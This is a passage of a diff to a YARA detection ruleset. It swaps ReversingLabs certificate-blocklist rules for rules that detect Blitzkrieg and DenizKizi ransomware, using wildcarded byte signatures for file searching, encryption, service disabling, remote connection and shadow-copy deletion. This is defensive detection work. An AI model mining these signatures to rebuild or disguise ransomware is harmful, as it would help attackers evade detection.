+            ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ??
+            ?? DC DE ?? 26 DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ??
+            11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ??
+            ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ??
+            DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ??
+            8E 69 3F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 3F ?? ?? ?? ?? 08
+        }
+		$find_files_p2 = {
+            13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 07 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13
+            ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
+            2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ??
+            ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ??
+            26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26
+            DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 07 11 ?? 28
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ??
+            7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ??
+            ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
+            ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A
+        }
+		$remote_connection = {
+            73 ?? ?? ?? ?? 0A 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 17 28 ?? ?? ??
+            ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 1C 6F ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            1C 6F ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
+            ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 0B DE ?? 26 72 ?? ?? ?? ??
+            28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 07 2A
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haivision Network Video" and pe.signatures [ i ] . serial == "5f:82:03:c4:30:fc:7d:b4:e6:1f:66:84:f6:82:9f:fc" and 1382572799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_file ) and ( $aes_encrypt ) and ( $remote_connection )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_6B6Daef5Be29F20Ddce4B0F5E9Fa6Ea5 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Blitzkrieg : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Blitzkrieg ransomware."
 		author = "ReversingLabs"
-		id = "55611c9a-d45d-55fa-8e5e-a5621223cc9d"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "078f7f9d-edd4-52b4-a30e-e968542da95c"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2524-L2540"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "edd2f302d2fac65f6a93372a24c3f80757f2b175af661032917366e9629c5491"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Blitzkrieg.yara#L1-L127"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "22dd16c886a1982186fe927e633be9951da7d7e664e877e11fa976696b2bc86f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Blitzkrieg"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Calibration Consultants" and pe.signatures [ i ] . serial == "6b:6d:ae:f5:be:29:f2:0d:dc:e4:b0:f5:e9:fa:6e:a5" and 1280447999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_57D6Dff1Ef96F01B9430666B2733Cc87 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "c20b81a1-7331-57a9-9daf-007ec516a473"
-		date = "2023-11-08"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2542-L2558"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "40d22137e9c5345859c5f000166da2a3117bcfcc19b4c5e81083cad80dfa6ee4"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 D2 89 55 ?? 89 55 ?? 89 45 ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 8B 45 ?? 8B 40 ?? 8B 10 FF 52 ?? 8B F0 4E 83 FE ?? 0F 8C ?? ??
+            ?? ?? 8B 45 ?? 8B 48 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 A0 ?? ?? ?? ?? 88
+            43 ?? C6 43 ?? ?? 8D 4D ?? 8B 45 ?? 8B 40 ?? 8B D6 8B 38 FF 57 ?? 8B 55 ?? 8B C3 E8
+            ?? ?? ?? ?? 8D 43 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3
+            8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 4B ?? 89 0C
+            82 4E 83 FE ?? 0F 85 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50
+            E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 84 C0 74 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
+		$search_files_p1 = {
+            E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 33 C0 89 45 ?? B2 ?? A1 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? F6 40 ?? ?? 74 ?? FF 45 ?? 8B 45 ?? F6 40
+            ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ??
+            74 ?? 83 45 ?? ?? 8B 45 ?? F6 40 ?? ?? 74 ?? 83 45 ?? ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 52 ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 40 ??
+            E8 ?? ?? ?? ?? 85 C0 7E ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 8B 52 ??
+            48 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 40 80 7C 02 ?? ?? 74 ?? 8D 85 ?? ?? ??
+            ?? 8B 55 ?? 8B 4D ?? 8B 49 ?? 4A 85 C9 74 ?? 3B 51 ?? 72 ?? E8 ?? ?? ?? ?? 42 8A 54
+            11 ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? EB ?? 8B 55 ?? 8B 45
+            ?? 8B 08 FF 51 ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 45 ?? FF 4D ?? 75 ?? 8B 45 ?? 8B 10 FF
+            52 ?? 48 85 C0 0F 8C ?? ?? ?? ?? 40 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            8B 55 ?? 8B 45 ?? 8B 18 FF 53 ?? 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 55 ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ??
+            ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 45 ?? 8B 8D ?? ?? ?? ?? 8B 55
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ??
+            B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 8F ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 84 C0 0F 85 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8B 55 ?? B8 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 85 C0 7F ?? 8B 45 ?? 8B 40 ?? 50 8B 4D ?? B2 ?? A1 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 8B D8 B2 ?? 8B C3 E8 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 45
+        }
+		$search_files_p2 = {
+            E8 ?? ?? ?? ?? 40 50 8D 45 ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 85 D2 74 ?? 3B 42 ?? 72 ?? E8 ?? ?? ?? ?? 8B 4B
+            ?? 89 0C 82 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8B
+            45 ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 85 C0 79 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0
+            5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ??
+            EB ?? FF 45 ?? FF 4D ?? 0F 85 ?? ?? ?? ?? 8B 45 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ??
+            64 FF 30 64 89 20 F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B
+            85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ??
+            8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 8D 85 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 8D 85 ?? ?? ?? ??
+            8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B 45 ??
+            8B 48 ?? 8B 45 ?? E8
+        }
+		$disable_services_p1 = {
+            E8 ?? ?? ?? ?? 8B F0 BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+        }
+		$disable_services_p2 = {
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ??
+            8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08
+            FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? BA
+            ?? ?? ?? ?? 8B C6 8B 08 FF 51 ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 6A ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 33 C9 33 D2 E8 ?? ?? ?? ?? 33 C0 5A
+            59 59 64 89 10 68 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Smart Plugin Ltda" and pe.signatures [ i ] . serial == "57:d6:df:f1:ef:96:f0:1b:94:30:66:6b:27:33:cc:87" and 1314575999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( all of ( $disable_services_p* ) ) and ( all of ( $search_files_p* ) ) and ( $encrypt_files ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0166B65038D61E5435B48204Cae4795A : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Denizkizi : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects DenizKizi ransomware."
 		author = "ReversingLabs"
-		id = "04bdefc5-ee4e-5a46-94d6-e3a5d8b56ce0"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "e16a00d6-d5b8-5702-9cd7-d037b0ff46a3"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2560-L2576"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4e289eda4d5381250bcd6e36daade6f1e1803b6d16578d7eaee4454cef6981d0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.DenizKizi.yara#L1-L88"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "fbeb01263d6f68141e094ba8fb1c1a54c601ab24292f5c6b0eb8cb0c49f46afc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "DenizKizi"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files = {
+            8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 8D 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ??
+            ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 7E ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ??
+            8B 55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B
+            55 ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 F6 85 ?? ?? ??
+            ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ??
+            BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8
+            ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 33 C0 5A 59 59 64 89 10 EB ?? E9 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C3 E9 ?? ?? ?? ?? EB ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files = {
+            55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ??
+            ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64
+            FF 30 64 89 20 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 33 C0 55 68 ?? ?? ??
+            ?? 64 FF 30 64 89 20 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? 8B 0D ?? ??
+            ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C9 B2 ?? A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89
+            45 ?? 8B 0D ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ??
+            ?? ?? 8B 45 ?? 8B 10 FF 12 52 50 8B 45 ?? 8B 10 FF 52 ?? B2 ?? A1 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 10 FF 12 50 8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ??
+            8B 45 ?? 8B 10 FF 52 ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 50
+            8B 4D ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 52 ?? 8B 55 ?? 8B 45 ??
+            E8 ?? ?? ?? ?? 8D 45 ?? B9 ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 50 8B 45 ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ??
+            ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? C3
+        }
+		$delete_shadow_copies = {
+            6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59
+            64 89 10 EB ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
+            00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ??
+            ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ??
+            ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 00 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B
